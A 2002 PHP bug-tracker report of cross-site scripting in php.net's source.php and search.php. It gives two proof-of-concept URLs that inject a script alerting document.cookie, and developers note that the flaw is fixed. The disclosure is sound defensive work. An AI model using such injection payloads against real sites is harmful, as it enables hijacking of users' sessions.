php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #16258 Cross-Site scripting in php.net
Submitted: 2002-03-25 08:57 UTC Modified: 2002-03-25 14:23 UTC
Votes:1
Avg. Score:2.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: nopman at hackermail dot com Assigned:
Status: Closed Package: Website problem
PHP Version: 4.1.2 OS: Unix
Private report: No CVE-ID: None
 [2002-03-25 08:57 UTC] nopman at hackermail dot com
There is a Cross-Site scripting problem in source.php and
search.php.
One can enter following URL:
http://www.php.net/source.php?url=/<script>alert(document.cookie)</script><!--.html
And following will also work:
http://www.php.net/search.php?show=nosource&auto=1&pattern=dfighdfughfg&base="><script>alert(document.cookie)</script><!--

Regards,
NopMan

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-03-25 09:00 UTC] sander@php.net
Marking as critical.
 [2002-03-25 14:23 UTC] jimw@php.net
This bug has been fixed in CVS.


 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon Jun 17 18:01:31 2024 UTC